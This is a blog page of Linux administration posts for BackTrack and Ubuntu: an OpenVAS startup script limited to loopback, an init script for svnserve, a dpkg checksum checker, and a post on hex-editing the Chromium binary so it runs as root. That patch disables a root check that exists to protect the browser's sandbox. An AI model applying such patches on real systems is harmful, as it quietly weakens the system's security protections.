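    127.*|localhost|::1) return 0 ;;
    *) return 1 ;;
  esac
}

# port_open HOST PORT: true if something accepts TCP connections there.
# Uses bash's /dev/tcp so no netcat is needed; the subshell drops the fd.
port_open() {
  ( exec 3<>"/dev/tcp/$1/$2" ) 2>/dev/null
}

# wait_for_port HOST PORT [SECONDS]: poll once a second until open or timeout.
wait_for_port() {
  local host=$1 port=$2 tries=${3:-30}
  while [ "$tries" -gt 0 ]; do
    port_open "$host" "$port" && return 0
    tries=$((tries - 1))
    sleep 1
  done
  return 1
}

start_openvas() {
  if ! is_loopback "$BIND"; then
    echo "refusing to bind OpenVAS services to non-loopback address $BIND" >&2
    return 1
  fi
  openvas-nvt-sync                       # menu item "OpenVAS NVT sync" (assumed)
  openvassd                              # menu item "Start OpenVAS scanner" (assumed)
  # openvasmd --rebuild talks to the scanner, so the scanner must listen first;
  # loading all NVTs can take a while, hence the longer timeout.
  wait_for_port "$BIND" "$SCANNER_PORT" 120 || { echo "scanner did not start" >&2; return 1; }
  openvasmd --rebuild
  openvasmd -p "$MANAGER_PORT" -a "$BIND"
  wait_for_port "$BIND" "$MANAGER_PORT" 60 || { echo "manager did not start" >&2; return 1; }
  openvasad -a "$BIND" -p "$ADMIN_PORT"
  wait_for_port "$BIND" "$ADMIN_PORT" 30 || { echo "administrator did not start" >&2; return 1; }
  gsad --http-only --listen="$BIND" -p "$WEB_PORT"
  wait_for_port "$BIND" "$WEB_PORT" 30 || { echo "gsad did not start" >&2; return 1; }
  echo "Greenbone Security Assistant ready at http://$BIND:$WEB_PORT"
}

# Run the sequence only when invoked as "start"; sourcing the file just
# defines the functions (useful for reusing wait_for_port elsewhere).
case "${1:-}" in
  start) start_openvas ;;
esac
```

Save it as start-openvas.sh and run `./start-openvas.sh start` instead of the four terminal lines. Because gsad is started with --http-only, the web interface and the login credentials travel in plain HTTP; keeping every listener on 127.0.0.1 is what makes that acceptable, which is why the script refuses any other bind address rather than silently exposing the admin ports.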

Sunday, August 21, 2011

Chrome on Backtrack 5


So you have Backtrack installed and now you want to get Chrome to run as root. The steps below walk you through installing the Chromium browser and running it as root. They can be adapted to the latest Chrome as well as to other applications that refuse to run as root, such as VLC; just modify them where necessary.


FYI: Chromium is the bleeding-edge development version of the Google browser project. It is the same browser, and whatever state it happens to be in, there are usually several Chromium builds per day.


Google Chrome is simply a "rebranding" of Chromium that is a little more ready for public consumption.



Steps:

First, let's install Chromium. Open a terminal:

[apt-get install chromium-browser]

Now change to the Chromium directory:

[cd /usr/lib/chromium-browser]

Now open the binary in a hex editor and switch to the ASCII column:

[hexedit chromium-browser]
[tab]

Now search for the string geteuid:

[ctrl s geteuid]

Change it to getppid and save:

[getppid ctrl x]

Chromium will now run as root. This works because Chromium's root check calls geteuid() and refuses to start when it returns 0; the edit renames that imported symbol to getppid, which is the same length (so the symbol table stays intact) and returns the parent process ID, which is never 0 for a browser launched from a shell. Two things follow from this: the check exists because Chromium's process sandbox is much weaker when every browser process already runs as uid 0, and a package upgrade replaces the patched binary, so the edit has to be repeated after chromium-browser is upgraded.
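A hex edit like this silently changes a file that the package manager installed, and it is easy to forget which binaries on a box have been patched. The following is an added example, not part of the original post: a small shell check that compares every file of an installed Debian/Ubuntu package against the checksums dpkg recorded at install time (/var/lib/dpkg/info/PACKAGE.md5sums), so a patched chromium-browser, or any other modified package file, shows up by path. The function takes an explicit root directory and an absolute path to the checksum file, so it can also be run against a mounted image or a copy; the demo-bin file used in the test below is constructed, not a real package.

```shell
#!/bin/sh
# Added example, not from the original post: list the files of an installed
# Debian/Ubuntu package that no longer match the checksums dpkg recorded when
# the package was installed. dpkg keeps one "<md5>  <path relative to />" line
# per file in /var/lib/dpkg/info/<package>.md5sums; a hex-edited binary such
# as the patched chromium-browser shows up as a mismatch.

# check_md5sums ROOT MD5SUMS_FILE
# Verifies every file listed in MD5SUMS_FILE (absolute path) relative to ROOT.
# Prints the path of each mismatching or missing file and returns 1 if there
# was any, 0 if all files match, 2 if ROOT or the checksum file is unusable.
check_md5sums() {
  root=$1
  sums=$2
  [ -d "$root" ] && [ -r "$sums" ] || return 2
  # md5sum -c prints "<path>: OK" or "<path>: FAILED[ open or read]" per line;
  # keep only the non-OK lines, strip the status, and exit 1 if there were any.
  ( cd "$root" && md5sum -c "$sums" 2>/dev/null ) |
    awk '!/: OK$/ { sub(/: [^:]*$/, ""); print; bad = 1 } END { exit bad }'
}

# check_package PACKAGE: the same check for a package installed on this system.
check_package() {
  check_md5sums / "/var/lib/dpkg/info/$1.md5sums"
}

# Command-line use: ./pkgcheck.sh chromium-browser
if [ -n "${1:-}" ]; then
  if check_package "$1"; then
    echo "all files of $1 match the installed package"
  else
    echo "the files above differ from the installed package $1" >&2
    exit 1
  fi
fi
```

Run `./pkgcheck.sh chromium-browser` after the hex edit and usr/lib/chromium-browser/chromium-browser is reported; run it again after an apt-get upgrade and the list is empty, which is the quickest way to notice that the upgrade undid the patch. Conffiles are not covered by the md5sums list, so edited configuration under /etc is not reported by this check.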


Tuesday, July 19, 2011

Adding start-up scripts to Linux

On the list of things to do after installing SVN was getting Ubuntu to start the service at boot. This procedure works for almost anything you'd like to run at boot.

Step 1 – Create your script.
Simply create a new file (I called mine startsvn) and type the command you'd like to run:

cd /etc/init.d/
sudo touch startsvn
sudo vi startsvn

The file contains the one command to run:

svnserve -d -r /usr/local/svn/repository_name

Step 2 – Save the script in the /etc/init.d/ folder

Step 3 – Make the script executable
sudo chmod +x startsvn

Step 4 – Add the script to the boot sequence
sudo update-rc.d startsvn defaults
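The one-line startsvn file works, but update-rc.d also registers the script for the shutdown runlevels, where it has nothing to stop, and svnserve ends up running as root because that is who runs init scripts. The script below is an added example, not from the original post or from Subversion: an LSB-style /etc/init.d/svnserve with start, stop and status actions that runs svnserve under a dedicated account. It assumes a system user named svn exists and owns the repository root; the path is the one from the post, and the LISTEN_HOST, RUNDIR and PIDFILE settings are this script's own.

```shell
#!/bin/sh
### BEGIN INIT INFO
# Provides:          svnserve
# Required-Start:    $remote_fs $syslog $network
# Required-Stop:     $remote_fs $syslog $network
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: Subversion svnserve daemon
### END INIT INFO
#
# Added example (not from the original post): an LSB-style replacement for the
# one-line startsvn script. Runs svnserve as the "svn" user instead of root and
# supports stop/status so update-rc.d can also stop it at shutdown.
# Assumptions: the svn system user exists and owns REPO_ROOT; LISTEN_HOST,
# RUNDIR and PIDFILE are this script's own choices.

DAEMON=/usr/bin/svnserve
REPO_ROOT=/usr/local/svn/repository_name        # repository root from the post
SVN_USER=svn                                    # assumed dedicated account
LISTEN_HOST=${SVNSERVE_LISTEN_HOST:-0.0.0.0}    # 127.0.0.1 if only local clients or an SSH tunnel need it
RUNDIR=/var/run/svnserve                        # owned by svn so the daemon can write its pid file
PIDFILE=$RUNDIR/svnserve.pid

# check_prereqs: fail early with a clear message instead of a silent boot-time failure.
check_prereqs() {
  [ -x "$DAEMON" ]    || { echo "svnserve: $DAEMON not found" >&2; return 1; }
  [ -d "$REPO_ROOT" ] || { echo "svnserve: repository root $REPO_ROOT missing" >&2; return 1; }
  id "$SVN_USER" >/dev/null 2>&1 || { echo "svnserve: user $SVN_USER does not exist" >&2; return 1; }
}

do_start() {
  check_prereqs || return 1
  install -d -o "$SVN_USER" -m 755 "$RUNDIR"
  # --chuid drops to the svn user before exec; svnserve daemonizes itself (-d)
  # and records its pid with --pid-file so do_stop can find it.
  start-stop-daemon --start --quiet --pidfile "$PIDFILE" \
    --chuid "$SVN_USER" --exec "$DAEMON" -- \
    -d -r "$REPO_ROOT" --listen-host "$LISTEN_HOST" --pid-file "$PIDFILE"
}

do_stop() {
  start-stop-daemon --stop --quiet --pidfile "$PIDFILE" --retry 5 && rm -f "$PIDFILE"
}

do_status() {
  if [ -f "$PIDFILE" ] && kill -0 "$(cat "$PIDFILE")" 2>/dev/null; then
    echo "svnserve is running (pid $(cat "$PIDFILE"))"
    return 0
  fi
  echo "svnserve is not running"
  return 3    # LSB status code for "not running"
}

case "${1:-}" in
  start)   do_start ;;
  stop)    do_stop ;;
  restart) do_stop; do_start ;;
  status)  do_status ;;
  "")      ;;    # no action (e.g. the file was sourced): only define the functions
  *)       echo "Usage: $0 {start|stop|restart|status}" >&2; exit 2 ;;
esac
```

Create the account first (`sudo adduser --system --group svn` and `sudo chown -R svn:svn /usr/local/svn/repository_name`), save the script as /etc/init.d/svnserve, then the same two commands as in the post apply: `sudo chmod +x /etc/init.d/svnserve` and `sudo update-rc.d svnserve defaults`. The practical difference from the one-liner is that a bug in svnserve now only gives an attacker the svn account's access to the repository, not root on the box.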

Another example: say you want to start your ColdFusion server at boot.

Step 1 – Create a link to your ColdFusion script
sudo ln -s /opt/coldfusion9/bin/coldfusion /etc/init.d/coldfusion

Step 2 – Update the boot sequence
sudo update-rc.d coldfusion defaults

Wiredwizrd

Morgan Todd Lewistown, PA

Experienced Information Technology Manager with a strong knowledge of technical guidance, IT best practices, security protocols, team leadership, and analyzing business requirements.